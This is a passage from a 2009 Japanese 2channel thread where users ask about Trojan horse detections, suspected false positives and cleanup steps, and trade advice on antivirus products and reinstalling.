向こうのスレで同じ状況だっていってくれてる人がいるんだから、誤検出の可能性が高いんじゃないの?
292 :名無しさん@お腹いっぱい。:2009/03/18(水) 16:59:14
グーグルの検索結果のこのページ
http://www.google.co.jp/search?hl=ja&lr=&q=%E3%83%8F%E3%83%97%E3%82%B9%E3%83%96%E3%83%AB%E3%82%AF%E3%80%80%E3%83%AD%E3%82%B9%E3%83%81%E3%83%A3%E3%82%A4%E3%83%AB%E3%83%89%E3%80%80&start=10&sa=N
の一番上にある
http://dilettante-salon.com/mailmagazine/backnumber/history/melmaga017.html
このサイトを踏んだところ、
「JS/Generic Exploit.i」というトロイの木馬が仕組まれていたようです。
ウイルス対策ソフトが削除してくれましたが、
このサイトは特に怪しい内容でもなさそうなのに何でトロイに感染するのか分かりません。
どなたか教えて下さい。
よろしくお願いします。
http://www.google.co.jp/search?hl=ja&lr=&q=%E3%83%8F%E3%83%97%E3%82%B9%E3%83%96%E3%83%AB%E3%82%AF%E3%80%80%E3%83%AD%E3%82%B9%E3%83%81%E3%83%A3%E3%82%A4%E3%83%AB%E3%83%89%E3%80%80&start=10&sa=N
の一番上にある
http://dilettante-salon.com/mailmagazine/backnumber/history/melmaga017.html
このサイトを踏んだところ、
「JS/Generic Exploit.i」というトロイの木馬が仕組まれていたようです。
ウイルス対策ソフトが削除してくれましたが、
このサイトは特に怪しい内容でもなさそうなのに何でトロイに感染するのか分かりません。
どなたか教えて下さい。
よろしくお願いします。
293 :名無しさん@お腹いっぱい。:2009/03/19(木) 12:47:34
294 :名無しさん@お腹いっぱい。:2009/03/20(金) 13:04:03
トロイの木馬に感染したらリカバリーしなきゃ駄目でしょうか?
ウイルスソフトで駆除してからも何度もトロイの木馬を検出...と出ます。
しかし検出結果にはトロイの木馬がなくて、スパイウェアだけです。これはどういう事ですか…??
駆除出来てないんでしょうか?
ウイルスソフトで駆除してからも何度もトロイの木馬を検出...と出ます。
しかし検出結果にはトロイの木馬がなくて、スパイウェアだけです。これはどういう事ですか…??
駆除出来てないんでしょうか?
295 :名無しさん@お腹いっぱい。:2009/03/20(金) 19:30:28
リカバリ後、同じセキュリティソフトで再現性があれば、そのセキュリティ
ソフトの使用を断念し、他社製品に乗り替えるのが賢明な策と云えるでしょう。
ソフトの使用を断念し、他社製品に乗り替えるのが賢明な策と云えるでしょう。
296 :名無しさん@お腹いっぱい。:2009/03/25(水) 04:34:30
あやしげなサイトです 何かきなくさい臭いがします。
ttp://www.steamcommunitycomgroupsadrenalina.tk/
ttp://www.freelotto.com/register.asp?skin=FWinner&affiliateid=&noepu=1&partner=1059565
ttp://www.steamcommunitycomgroupsadrenalina.tk/
ttp://www.freelotto.com/register.asp?skin=FWinner&affiliateid=&noepu=1&partner=1059565
297 :名無しさん@お腹いっぱい。:2009/03/31(火) 10:57:45
どうやら外付HD経由でトロイに感染してしまいましたorz
PCを起動するたびに「0x01...の動作がキャンセルされました」
と停止マークと共に出てきて、抵抗しようと「Ctrl+Alt+Delete」
でPCの動作を確認したら、
プロセス欄に約35こもの訳わからないプログラムが起動(ダウンロード?○○mbと出ていた)してる状態でした。
ウイルス対策とかに疎い僕にどなたかお教えいただけないでしょうか。
よろしくお願いいたしますm(__)m
PCを起動するたびに「0x01...の動作がキャンセルされました」
と停止マークと共に出てきて、抵抗しようと「Ctrl+Alt+Delete」
でPCの動作を確認したら、
プロセス欄に約35こもの訳わからないプログラムが起動(ダウンロード?○○mbと出ていた)してる状態でした。
ウイルス対策とかに疎い僕にどなたかお教えいただけないでしょうか。
よろしくお願いいたしますm(__)m
298 :八頭 ◆YAGApwSaEw :2009/03/31(火) 22:11:50
>>297
→セキュリティ初心者質問スレッドpart117
http://pc11.2ch.net/test/read.cgi/sec/1235133157/4
*PCトラブル質問掲示板 (ウイルスによるトラブルに見舞われている方の解決掲示板) へ
→セキュリティ初心者質問スレッドpart117
http://pc11.2ch.net/test/read.cgi/sec/1235133157/4
*PCトラブル質問掲示板 (ウイルスによるトラブルに見舞われている方の解決掲示板) へ
299 :294:2009/04/03(金) 06:14:27
300 :名無しさん@お腹いっぱい。:2009/04/03(金) 10:24:32
そのアンチウイルスソフトの誤検出だってことじゃね?
301 :名無しさん@お腹いっぱい。:2009/04/05(日) 01:51:23
なんかgih.exeという怪しいものがタスクマネージャを眺めてたらあったので削除したのですけどもう大丈夫ですかね?
302 :名無しさん@お腹いっぱい。:2009/04/07(火) 01:36:23
初めてトロイの木馬に感染したのですが、
ウイルスバスター2008で検出されたTROJ_GENOME.BK
をトレンドマイクロで調べた結果をみて誤検出だと思うのですが
TROJ_GENOME.BKはトロイの木馬では無いと理解してよろしいのでしょうか??
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FGENOME%2EBK&VSect=P
ウイルスバスター2008で検出されたTROJ_GENOME.BK
をトレンドマイクロで調べた結果をみて誤検出だと思うのですが
TROJ_GENOME.BKはトロイの木馬では無いと理解してよろしいのでしょうか??
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FGENOME%2EBK&VSect=P
303 :名無しさん@お腹いっぱい。:2009/04/07(火) 11:20:35
>>296
↑スパム送信者のブラックリストに引っかかった
↓不明
>>302
>この誤警告はパターンファイル 5.947.00 以降で修正されています。
ってあるからパターンファイル最新のにしてもう一度検索すれば検出されないんじゃない?
↑スパム送信者のブラックリストに引っかかった
↓不明
>>302
>この誤警告はパターンファイル 5.947.00 以降で修正されています。
ってあるからパターンファイル最新のにしてもう一度検索すれば検出されないんじゃない?
>>303
最新のパターンファイルに更新して、検出をおこなうとトロイは出てきませんでした
最新のパターンファイルに更新して、検出をおこなうとトロイは出てきませんでした
305 :名無しさん@お腹いっぱい。:2009/04/10(金) 13:44:01
昨日、foooooのサイトを見た瞬間、トロイの木馬が検出されましたと表示され
て遮断しましたと表示(kaspersky2009)されましたがそれから何もしなくても
大丈夫でしょうか?ウェブアンチウイルスのレポートにはそれだけがのっている
んですが、サポートに問い合わせたらプロテクションが「コンピュータは安全です」
と表示されていれば問題はないと言われましたが、なにぶん超初心者なので
わかりません。どなたか教えてください!非常に不安です。
て遮断しましたと表示(kaspersky2009)されましたがそれから何もしなくても
大丈夫でしょうか?ウェブアンチウイルスのレポートにはそれだけがのっている
んですが、サポートに問い合わせたらプロテクションが「コンピュータは安全です」
と表示されていれば問題はないと言われましたが、なにぶん超初心者なので
わかりません。どなたか教えてください!非常に不安です。
306 :名無しさん@お腹いっぱい。:2009/04/10(金) 21:27:30
C:\Program Files\Le.Chocolat\SWANSONG\xp3dec.tpm Infected: Gen:Trojan.Heur.GM.0804022C00
C:\Program Files\Le.Chocolat\SWANSONG\xp3dec.tpm Disinfection failed
C:\Program Files\Le.Chocolat\SWANSONG\xp3dec.tpm Moved
C:\Program Files\Yahoo!J\Yahoo! Widget Engine\uninstall.exe Infected: Trojan.Generic.978943
C:\Program Files\Yahoo!J\Yahoo! Widget Engine\uninstall.exe Deleted
ヤホのプログラムにまでトロイがいたんですが大丈夫でしょうか?
C:\Program Files\Le.Chocolat\SWANSONG\xp3dec.tpm Disinfection failed
C:\Program Files\Le.Chocolat\SWANSONG\xp3dec.tpm Moved
C:\Program Files\Yahoo!J\Yahoo! Widget Engine\uninstall.exe Infected: Trojan.Generic.978943
C:\Program Files\Yahoo!J\Yahoo! Widget Engine\uninstall.exe Deleted
ヤホのプログラムにまでトロイがいたんですが大丈夫でしょうか?
307 :名無しさん@お腹いっぱい。:2009/04/10(金) 21:30:54
常識です
308 :305:2009/04/11(土) 13:36:45
ウイルス名は「torojan downloader.win32.generic」です。
カスペルスキー2009のレポートでは検知、遮断されたとありますが
ステータスバーで確認すると見つかりませんと書かれていたのです。
状態は「コンピュータは安全です」となっているのですが
特に不具合はないし問題はないかなと思っているのですが皆さんは
このウイルスにどう対応されてますか?
カスペルスキー2009のレポートでは検知、遮断されたとありますが
ステータスバーで確認すると見つかりませんと書かれていたのです。
状態は「コンピュータは安全です」となっているのですが
特に不具合はないし問題はないかなと思っているのですが皆さんは
このウイルスにどう対応されてますか?
309 :名無しさん@お腹いっぱい。:2009/04/16(木) 00:46:16
勤め先のホームページがトロイに感染していると言われました。
職場のPCで見てみたところ読み込んだ瞬間に激しく重たくなる以外には
異常動作は見られませんでしたが、自宅のPCではアラートで
「HTML:Iframe-inf」が検出されたと出ました。
ソースを見てみたところiframeで「lotmachinesguide.cn」へのリンクが埋め込まれていました。
自分なりに調べてみたのですがよく分からず…悪質なものだったら
早急に対処すべきなのですが私に知識が無いため「何かが起こっている」程度の
説明しかできなくてPC音痴の上司に事情が伝わりません。
具体的にどういうものなのかお分かりになる方、教えていただけませんでしょうか。
職場のPCで見てみたところ読み込んだ瞬間に激しく重たくなる以外には
異常動作は見られませんでしたが、自宅のPCではアラートで
「HTML:Iframe-inf」が検出されたと出ました。
ソースを見てみたところiframeで「lotmachinesguide.cn」へのリンクが埋め込まれていました。
自分なりに調べてみたのですがよく分からず…悪質なものだったら
早急に対処すべきなのですが私に知識が無いため「何かが起こっている」程度の
説明しかできなくてPC音痴の上司に事情が伝わりません。
具体的にどういうものなのかお分かりになる方、教えていただけませんでしょうか。
310 :名無しさん@お腹いっぱい。:2009/04/16(木) 17:04:34
そのサイト教えろや
311 :名無しさん@お腹いっぱい。:2009/04/17(金) 12:47:24
ブラックアウトするからてっきりPCが逝ったのかと思って
数日新製品検討に費やしたけどどうやらトロイだったっぽい
何とか再感染しなくなったし新OS出るまで持ってくれよ
数日新製品検討に費やしたけどどうやらトロイだったっぽい
何とか再感染しなくなったし新OS出るまで持ってくれよ
312 :名無しさん@お腹いっぱい。:2009/04/17(金) 13:25:00
Trojan-Downloader.WMA.GetCodec.uが検出されたのですが・・・
対処法を教えて下さい;;
対処法を教えて下さい;;
313 :名無しさん@お腹いっぱい。:2009/04/22(水) 16:53:07
ノートンがエロゲのディスクに対して「トロイの木馬が検出されました」て出た
おいおい誤検出だよな?
おいおい誤検出だよな?
314 :名無しさん@お腹いっぱい。:2009/04/23(木) 21:45:51
>>313
エロゲ作っているのはほとんどシナ人
エロゲ作っているのはほとんどシナ人
315 :名無しさん@お腹いっぱい。:2009/04/28(火) 23:55:56
>>296
悪い予感的中
悪い予感的中
316 :名無しさん@お腹いっぱい。:2009/05/02(土) 14:27:47
マカフィー使用。Generic Dropper.ek とかいうトロイを二度も検出した。
二度とも削除されたが、リカバリしないと駄目かなぁ
二度とも削除されたが、リカバリしないと駄目かなぁ
317 :名無しさん@お腹いっぱい。:2009/05/05(火) 00:53:43
Win32:KavosというのがUSBから検出されたのでチェストに移動したのですが
トロイですよね?
USBの中のファイルはもうだめですか?
USBの中の課題をやらなきゃいけないのですがやめといた方がいいでしょうか?
トロイですよね?
USBの中のファイルはもうだめですか?
USBの中の課題をやらなきゃいけないのですがやめといた方がいいでしょうか?
318 :名無しさん@お腹いっぱい。:2009/05/05(火) 13:13:58
319 :名無しさん@お腹いっぱい。:2009/05/05(火) 15:38:18
320 :名無しさん@お腹いっぱい。:2009/05/19(火) 08:01:50
ちょっとテスト
321 :名無しさん@お腹いっぱい。:2009/05/19(火) 08:03:20
avastたんが怒ってる
322 :名無しさん@お腹いっぱい。:2009/05/20(水) 19:00:11
アニメ板の前スレを見ようとするとトロイの木馬を発見しましたって出て
見れなくなるんですが、なんでですか?
ほかの板の前スレは見れるんですが。
見れなくなるんですが、なんでですか?
ほかの板の前スレは見れるんですが。
323 :名無しさん@お腹いっぱい。:2009/05/20(水) 21:18:38
324 :名無しさん@お腹いっぱい。:2009/05/21(木) 11:06:59
325 :名無しさん@お腹いっぱい。:2009/05/21(木) 15:19:46
VIP見たらavastが感染の警告を鳴らした
スキャナをしたら感染数0だったけどWebシールドが感染数1
プロバイダの状況を終了してまた開始したら0になったけど
大丈夫なのかな?
初めて感染したから怖い
スキャナをしたら感染数0だったけどWebシールドが感染数1
プロバイダの状況を終了してまた開始したら0になったけど
大丈夫なのかな?
初めて感染したから怖い
326 :名無しさん@お腹いっぱい。:2009/05/21(木) 15:33:19
327 :名無しさん@お腹いっぱい。:2009/05/21(木) 16:33:30
違う板だけど、見ようとしたら今AVASTがトロイ検出したと言って遮断された
ゲーサロ板にここのAVASTスレもorz
ゲーサロ板にここのAVASTスレもorz
ここのウイルス検査したら異常なしだった
http://security.symantec.com/sscv6/home.asp?langid=jp&venid=sym&plfid=21&pkj=FYNVYHGBYNCJEIMXQKC
ご認知なのだろうか?
http://security.symantec.com/sscv6/home.asp?langid=jp&venid=sym&plfid=21&pkj=FYNVYHGBYNCJEIMXQKC
ご認知なのだろうか?
329 :名無しさん@お腹いっぱい。:2009/05/28(木) 22:40:10
セキュリティソフトゼロでウィルス検索したら is a trojanって二件出たんですけどこれってトロイですか?
削除するにはどうしたらよいでしょうか…?
削除するにはどうしたらよいでしょうか…?
330 :名無しさん@お腹いっぱい。:2009/05/31(日) 17:20:28
クリーンインストール
331 :名無しさん@お腹いっぱい。:2009/06/01(月) 17:06:06
セキュリティソフトゼロとやらのスレで聞けよ
332 :名無しさん@お腹いっぱい。:2009/06/01(月) 23:11:56
2chの規制議論板に入ろうとするとavastがトロイ発見しましたと
サイレン鳴らすんだが・・・
サイレン鳴らすんだが・・・
333 :名無しさん@お腹いっぱい。:2009/06/02(火) 07:28:51
どうやらトロイの木馬に感染したみたいなんですが、
特徴が、
・1時間ぐらいごとにインターネットが強制終了される。
・今まで使っていたトレンド社のウイルススキャンが使えない
・さらに、他何社かのウイルススキャンも試してみたが、
『ネットワークに接続してください』などと出て、
ウイルスキャン自体が使えない。
他にもあると思うんですがいま分かっているのは
これだけです。
インターネットは利用でき、他は問題なく使えますが
こんなことは初めてなのでどうしたらいいかも、
知識もまったくありません。
ファイルスキャンという物も試そうと思ってみましたが、
どこに潜んでいるのかも分からず完全に手詰まりです。
どなたか解決方法、解決までの手順などを教えてください。
スレ違いでしたらご指摘下さい。
よろしくお願いします。
特徴が、
・1時間ぐらいごとにインターネットが強制終了される。
・今まで使っていたトレンド社のウイルススキャンが使えない
・さらに、他何社かのウイルススキャンも試してみたが、
『ネットワークに接続してください』などと出て、
ウイルスキャン自体が使えない。
他にもあると思うんですがいま分かっているのは
これだけです。
インターネットは利用でき、他は問題なく使えますが
こんなことは初めてなのでどうしたらいいかも、
知識もまったくありません。
ファイルスキャンという物も試そうと思ってみましたが、
どこに潜んでいるのかも分からず完全に手詰まりです。
どなたか解決方法、解決までの手順などを教えてください。
スレ違いでしたらご指摘下さい。
よろしくお願いします。
334 :名無しさん@お腹いっぱい。:2009/06/02(火) 19:01:24
>>333
知識ないなら、クリーンインストールした方が早い
知識ないなら、クリーンインストールした方が早い
335 :名無しさん@お腹いっぱい。:2009/06/02(火) 20:46:23
Trojan HunterとTrojan Removerどっちがいい?
336 :名無しさん@お腹いっぱい。:2009/06/05(金) 19:45:56
http://www.india-center.org/content/j_main.php
ここで「HTML:Iframe-inf」が検出されるけど、ウィルス?
ここで「HTML:Iframe-inf」が検出されるけど、ウィルス?
337 :名無しさん@お腹いっぱい。:2009/06/08(月) 11:12:34
トロイや他の流出ウィルスに感染したことがないからよく知らないけど
一度感染して不正侵入や遠隔操作、流出の被害にあうと
感染したPCをクリーンインストールしても
今度はウィルスを踏まなくてもそのPCを突き止めて
不正侵入することが可能なのでしょうか
一度感染して不正侵入や遠隔操作、流出の被害にあうと
感染したPCをクリーンインストールしても
今度はウィルスを踏まなくてもそのPCを突き止めて
不正侵入することが可能なのでしょうか
338 :名無しさん@お腹いっぱい。:2009/06/09(火) 02:28:45
【ノーガード厨死亡】 PC内の全データを削除する破壊的トロイの木馬が流行中
http://tsushima.2ch.net/test/read.cgi/news/1244477674/
http://tsushima.2ch.net/test/read.cgi/news/1244477674/
339 :名無しさん@お腹いっぱい。:2009/06/09(火) 22:20:48
340 :名無しさん@お腹いっぱい。:2009/06/14(日) 21:21:43
木馬ヤバイ
341 :名無しさん@お腹いっぱい。:2009/06/19(金) 03:08:28
http://sa10kh.blog65.fc2.com/blog-category-14.html
ここでhtml iframe-infウィルス感知しました(Avast!仕様)。
ここでhtml iframe-infウィルス感知しました(Avast!仕様)。
342 :名無しさん@お腹いっぱい。:2009/07/12(日) 16:32:18
電源を入れてしばらく放っておくと画面真っ暗になりますよね?
それでキーを連打したりマウスを動かすと画面が映るんですが真っ暗のままでした。
仕方がないので強制的に電源を切って(電源ボタンを押す)またつけたら
ウィルスバスターがなんか言ってきてやったらトロイの木馬が26件も!
これは定期的にウィルスバスターでチェックしなければならないのでしょうか?
うう、わかんないです><
それでキーを連打したりマウスを動かすと画面が映るんですが真っ暗のままでした。
仕方がないので強制的に電源を切って(電源ボタンを押す)またつけたら
ウィルスバスターがなんか言ってきてやったらトロイの木馬が26件も!
これは定期的にウィルスバスターでチェックしなければならないのでしょうか?
うう、わかんないです><
343 :名無しさん@お腹いっぱい。:2009/07/12(日) 18:12:12
>>342
1.ノートン インターネットセキュリティ 2010ベータ版(14日使える最新版)のインストーラーをダウンロードしておく
ttp://www.symantec.com/ja/jp/norton/beta/index.jsp?inid=jp_ghp_hero_beta2010
2.ネット回線ケーブルを抜いてウイルスバスターをアンインストール
3.ノートン インターネットセキュリティ 2010ベータ版をインストール、PC再起動
4.ネット接続してやる→Live Update→システムの完全スキャン
操作でわからないことはNorton2009スレへ
1.ノートン インターネットセキュリティ 2010ベータ版(14日使える最新版)のインストーラーをダウンロードしておく
ttp://www.symantec.com/ja/jp/norton/beta/index.jsp?inid=jp_ghp_hero_beta2010
2.ネット回線ケーブルを抜いてウイルスバスターをアンインストール
3.ノートン インターネットセキュリティ 2010ベータ版をインストール、PC再起動
4.ネット接続してやる→Live Update→システムの完全スキャン
操作でわからないことはNorton2009スレへ
344 :名無しさん@お腹いっぱい。:2009/07/13(月) 14:47:28
↑ノートンに乗り換えさせようと画策する工作員
345 :名無しさん@お腹いっぱい。:2009/07/14(火) 23:49:30
なぜ分かった?
346 :名無しさん@お腹いっぱい。:2009/07/21(火) 17:09:36
ttp://nagoya.cool.ne.jp/infinite/internet/trojan_horse.html
ここの方法で調べてみたのですが、
感染してますか?
ttp://www.dotup.org/uploda/www.dotup.org264950.jpg
ここの方法で調べてみたのですが、
感染してますか?
ttp://www.dotup.org/uploda/www.dotup.org264950.jpg
347 :名無しさん@お腹いっぱい。:2009/07/22(水) 01:10:30
してるしてる
348 :名無しさん@お腹いっぱい。:2009/07/25(土) 13:06:55
今日Cravingで動画サイトからMP3に変換→Itunesに自動登録をしていたら
英字の警告が出た後にトロイの木馬が検出されたという表示がでたんです。
で全ファイルスキャンをかけたら、なにやらItunes関係のファイルが感染していたらしく
そのリストに表示されていたファイルやらを削除して、Itunesを再インストールしようとしてみたんですが
インストールの途中でもまたトロイの木馬が検出されてしまいItunesがインストールできません・・・・
なにかいい解決法があったら教えていただけませんか?
英字の警告が出た後にトロイの木馬が検出されたという表示がでたんです。
で全ファイルスキャンをかけたら、なにやらItunes関係のファイルが感染していたらしく
そのリストに表示されていたファイルやらを削除して、Itunesを再インストールしようとしてみたんですが
インストールの途中でもまたトロイの木馬が検出されてしまいItunesがインストールできません・・・・
なにかいい解決法があったら教えていただけませんか?
349 :名無しさん@お腹いっぱい。:2009/07/25(土) 13:42:25
AVGを窓から投げ捨てるといいと思います
350 :名無しさん@お腹いっぱい。:2009/07/25(土) 13:57:19
俺のパソコンもItunesからトロイの木馬が
わんさか出てきた
何故だ
わんさか出てきた
何故だ
351 :名無しさん@お腹いっぱい。:2009/07/25(土) 14:16:42
ん
AVGお得意のapple系誤検出じゃなくて?
もし違ってたらごめんね
AVGお得意のapple系誤検出じゃなくて?
もし違ってたらごめんね
352 :名無しさん@お腹いっぱい。:2009/07/25(土) 14:46:06
353 :名無しさん@お腹いっぱい。:2009/07/29(水) 17:38:14
このウイルスに感染したんですが症状がでません。どうしたらいいか…
トロイの木馬Generic13.AWQH
トロイの木馬Generic13.AWQH
354 :名無しさん@お腹いっぱい。:2009/07/29(水) 23:42:26
エヴァ新劇場版のまとめWIKIのトップのリンクがトロイブラクラに
かわってるな
かわってるな
355 :名無しさん@お腹いっぱい。:2009/08/06(木) 01:41:23
.,,.,;:.;:,., .,.,.;:,.;:.,.,
///三三\____/三三\\
/////三三三|;: ;: ;: ;: ;:;::|三三三\\\
/////三三|;: ;: ;: ;: ::;:;::|三三\\\\\
/////´ \\\\ |
///// | | | | | | | |
│| | | | || | | | | | | | |
│| │| │| =゙゙゙゙゙゙゙*、,_ .**''"~~ヽ. | | | | | | | |
│| │| │| ,ィ''f,ワ'ァ..` r''ィ''f,ワ''ァ | | | | | | | | |
│| │| │|| .::" l゙ ゙l ゙、、: | | | | | | | | |||
| | | | | | | | r:: ..'-,゙l | | | | | | | | |
| | | | | | | ..l゙::,;:;:,: :,,,‘,!: : : : .|| | | | | | | |
| | | | | || | : ゙-゙;:”;:;:~.┘ : : : | | | | | | |||
| | | | | | | | : : : ;;:;:;:;:,, ;:;: ;:;:;:;;: ;: ; : :| | | | | | |
|| | | | | | | : : .-'゛: : : : : : :゙'' : : :| | | | | | |
| || || | | | | | : `'" ̄ ̄ ̄~" ,l| | | | | | |
| | | | | | ||| |\、 ゙゙゙゙゙゙゙゙゙゙^ l゙| | | | | | |li!
彡彡彡彡彡//`'-,、 ,/l|l|l|| | | | | | | |
彡彡彡彡彡///////l、: : : : : : : : : : .,!_,/ ,,,lll゙゙,,lllll゙,il゙゜| | | | |i!!|
///三三\____/三三\\
/////三三三|;: ;: ;: ;: ;:;::|三三三\\\
/////三三|;: ;: ;: ;: ::;:;::|三三\\\\\
/////´ \\\\ |
///// | | | | | | | |
│| | | | || | | | | | | | |
│| │| │| =゙゙゙゙゙゙゙*、,_ .**''"~~ヽ. | | | | | | | |
│| │| │| ,ィ''f,ワ'ァ..` r''ィ''f,ワ''ァ | | | | | | | | |
│| │| │|| .::" l゙ ゙l ゙、、: | | | | | | | | |||
| | | | | | | | r:: ..'-,゙l | | | | | | | | |
| | | | | | | ..l゙::,;:;:,: :,,,‘,!: : : : .|| | | | | | | |
| | | | | || | : ゙-゙;:”;:;:~.┘ : : : | | | | | | |||
| | | | | | | | : : : ;;:;:;:;:,, ;:;: ;:;:;:;;: ;: ; : :| | | | | | |
|| | | | | | | : : .-'゛: : : : : : :゙'' : : :| | | | | | |
| || || | | | | | : `'" ̄ ̄ ̄~" ,l| | | | | | |
| | | | | | ||| |\、 ゙゙゙゙゙゙゙゙゙゙^ l゙| | | | | | |li!
彡彡彡彡彡//`'-,、 ,/l|l|l|| | | | | | | |
彡彡彡彡彡///////l、: : : : : : : : : : .,!_,/ ,,,lll゙゙,,lllll゙,il゙゜| | | | |i!!|
356 :名無しさん@お腹いっぱい。:2009/08/06(木) 15:40:35
エロゲからGeneric13.BXBWをAVG.8.5から出てきたけど
誰か詳細分かる人いる?
誰か詳細分かる人いる?
357 :名無しさん@お腹いっぱい。:2009/08/08(土) 20:03:18
AVG()笑
358 :名無しさん@お腹いっぱい。:2009/08/08(土) 21:24:06
ノートンでスキャンした所、Trojan.Malscript!htmlが検出されて焦っています。
特に危険なサイトにアクセスした記憶もないのですが…
検出されたファイルもノートンが教えてくれずどうしていいかわからない状態です。
ウイルスが検出された時、感染元ファイルはどうすればわかるのでしょうか?
すみません、よろしくお願いします。
特に危険なサイトにアクセスした記憶もないのですが…
検出されたファイルもノートンが教えてくれずどうしていいかわからない状態です。
ウイルスが検出された時、感染元ファイルはどうすればわかるのでしょうか?
すみません、よろしくお願いします。
359 :358:2009/08/09(日) 12:32:19
自己解決しました!
360 :名無しさん@お腹いっぱい。:2009/08/09(日) 18:11:59
常駐監視ソフトでお勧めってありますか?
現在はESET + a-squared Freeで防護しているのですが、常駐のトロイ対策ソフトがないのでまずいのかな?と
それともこれくらいで十分でしょうか?
現在はESET + a-squared Freeで防護しているのですが、常駐のトロイ対策ソフトがないのでまずいのかな?と
それともこれくらいで十分でしょうか?
361 :名無しさん@お腹いっぱい。:2009/08/10(月) 16:42:25
トロイに感染してるとPCの動作重くなったりする?
数週間前からファイル開くのにえらい時間かかるようになってて
変だな〜って思ってたんだけど
昨日トロイ検出されて削除したら途端にかるくなってんの
なんかされてたのかな 怖いな〜
数週間前からファイル開くのにえらい時間かかるようになってて
変だな〜って思ってたんだけど
昨日トロイ検出されて削除したら途端にかるくなってんの
なんかされてたのかな 怖いな〜
362 :名無しさん@お腹いっぱい。:2009/08/10(月) 17:52:06
極端に重くなったりはしないだろ
地味になんかおかしいなぁ程度じゃね?
地味になんかおかしいなぁ程度じゃね?
363 :名無しさん@お腹いっぱい。:2009/08/10(月) 18:19:27
364 :名無しさん@お腹いっぱい。:2009/08/11(火) 12:07:34
ルール「Bla トロイの木馬のデフォルト遮断」が ******(220.104.46.174)、1042 を遮断しました
インバウンド UDP パケット
ローカルアドレス、サービスは (localhost、1042)
リモートアドレス、サービスは (******(220.104.46.174)、1042)
プロセス名は "N/A"
ネットつなげるたびにトロイアタックが来るんだけど、
******の部分が自分なのよね。IPが自分と同じってだけ?
これってどういうことか教えてください。
インバウンド UDP パケット
ローカルアドレス、サービスは (localhost、1042)
リモートアドレス、サービスは (******(220.104.46.174)、1042)
プロセス名は "N/A"
ネットつなげるたびにトロイアタックが来るんだけど、
******の部分が自分なのよね。IPが自分と同じってだけ?
これってどういうことか教えてください。
365 :名無しさん@お腹いっぱい。:2009/08/13(木) 04:15:19
富士通製PC使ってる方に質問
C:\fjuty\FSTフォルダの「FSTIEmcf.exe」ってファイルが、最近スキャンに
引っかかってませんか?
ちなみにウチはAhnLab使ってて、Win-Trojan/Xema.variantが検出されます
ググってみたら、同名のファイルがトロイに指定されてるような…
C:\fjuty\FSTフォルダの「FSTIEmcf.exe」ってファイルが、最近スキャンに
引っかかってませんか?
ちなみにウチはAhnLab使ってて、Win-Trojan/Xema.variantが検出されます
ググってみたら、同名のファイルがトロイに指定されてるような…
366 :名無しさん@お腹いっぱい。:2009/08/14(金) 10:25:12
俺のは引っかからないぞ
他のセキュリティソフト試してみては?
他のセキュリティソフト試してみては?
367 :名無しさん@お腹いっぱい。:2009/08/15(土) 12:36:26
携帯ゲーRPG板行こうとするとトロイ検出で切断しますか?って出る
前にも他板で同じようなことあったみたいだけど、自PCには問題ないのかな
前にも他板で同じようなことあったみたいだけど、自PCには問題ないのかな
368 :名無しさん@お腹いっぱい。:2009/08/15(土) 12:52:14
370 :名無しさん@お腹いっぱい。:2009/08/15(土) 15:57:26
んなもんここじゃなくてPC一般板かノートPC板で聞くなり待つなりしろ
371 :名無しさん@お腹いっぱい。:2009/08/15(土) 16:12:12
はい、お世話になりました〜
372 :名無しさん@お腹いっぱい。:2009/08/15(土) 21:35:30
常駐系でお勧めというか定番ってあるんですか?有料でいいのですが
a-squaredの常駐版買えばOKですかね?
a-squaredの常駐版買えばOKですかね?
373 :名無しさん@お腹いっぱい。:2009/08/16(日) 15:15:54
どこが定番なんだよ
ドマイナーもいいとこじゃねーか
ドマイナーもいいとこじゃねーか
374 :名無しさん@お腹いっぱい。:2009/08/16(日) 20:55:29
どーやら、ありとあらゆるウィルスソフトを使っても対処できない
ウィルスにかかったようだ 初めてなのでこれがどれぐらいの重度なのかわからんが
状況としては
IEを開くと時間差で別の海外のサイトが新しいウィンドウで開くといったもの
出れば手動で閉じれば対処できるが
いろんなサイトを開いてるかぎり 時間差ででるというイタチごっこ
ウィルスにかかったようだ 初めてなのでこれがどれぐらいの重度なのかわからんが
状況としては
IEを開くと時間差で別の海外のサイトが新しいウィンドウで開くといったもの
出れば手動で閉じれば対処できるが
いろんなサイトを開いてるかぎり 時間差ででるというイタチごっこ
>>364なんだけど、何気なくCCCクリーナーやってみたら
JS_GUMBLAR.ERKに感染してた。
てか5月にGENOウイルスにやられてリカバリしたってのに・・・。
たぶんコイツがトロイを呼んでたのかと。
ノートン先生入れてるけど引っかかんなかったんだよなあ
JS_GUMBLAR.ERKに感染してた。
てか5月にGENOウイルスにやられてリカバリしたってのに・・・。
たぶんコイツがトロイを呼んでたのかと。
ノートン先生入れてるけど引っかかんなかったんだよなあ
376 :名無しさん@お腹いっぱい。:2009/08/18(火) 14:26:59
新出ウィルスかのぅ 大変だのぅ
とりあえずIE関連のプロセスを網羅してみたらどうよ
とりあえずIE関連のプロセスを網羅してみたらどうよ
377 :名無しさん@お腹いっぱい。:2009/08/22(土) 22:18:42
トロイの木馬って通販とかで住所書いてるとき
相手から見えたりするの?
相手から見えたりするの?
378 :名無しさん@お腹いっぱい。:2009/08/22(土) 22:20:40
えっ
379 :名無しさん@お腹いっぱい。:2009/08/23(日) 01:00:55
見えたりする木馬も有るんじゃねー?
NetBusやらBO2Kみたいなバックドアのタイプだったり
キーロガーやスクリーンロガーだったり
NetBusやらBO2Kみたいなバックドアのタイプだったり
キーロガーやスクリーンロガーだったり
380 :名無しさん@お腹いっぱい。:2009/08/26(水) 11:39:08
AVGで検出された、トロイの木馬SHeur2.AYOE AYOA AYNH AYUO AWOLAWOM AWON AWJU AWOJ×2つ
AWSU AWKT×2
トロイの木馬Generic14.FVVは
削除して大丈夫でしょうか?
AWSU AWKT×2
トロイの木馬Generic14.FVVは
削除して大丈夫でしょうか?
381 :八頭 ◆YAGApwSaEw :2009/08/26(水) 21:12:32
>>380
感染し過ぎだろ
SHeur2. = AVGのヒューリスティック(予測)検出
Generic14. = AVGのヒューリスティック(部品)検出
セキュリティ初心者質問スレッドpart120 の◆N9P3SuvBPo(AVG使いのヒマ人)に今後の指示をもらいましょう
http://pc11.2ch.net/test/read.cgi/sec/1250027233/
感染し過ぎだろ
SHeur2. = AVGのヒューリスティック(予測)検出
Generic14. = AVGのヒューリスティック(部品)検出
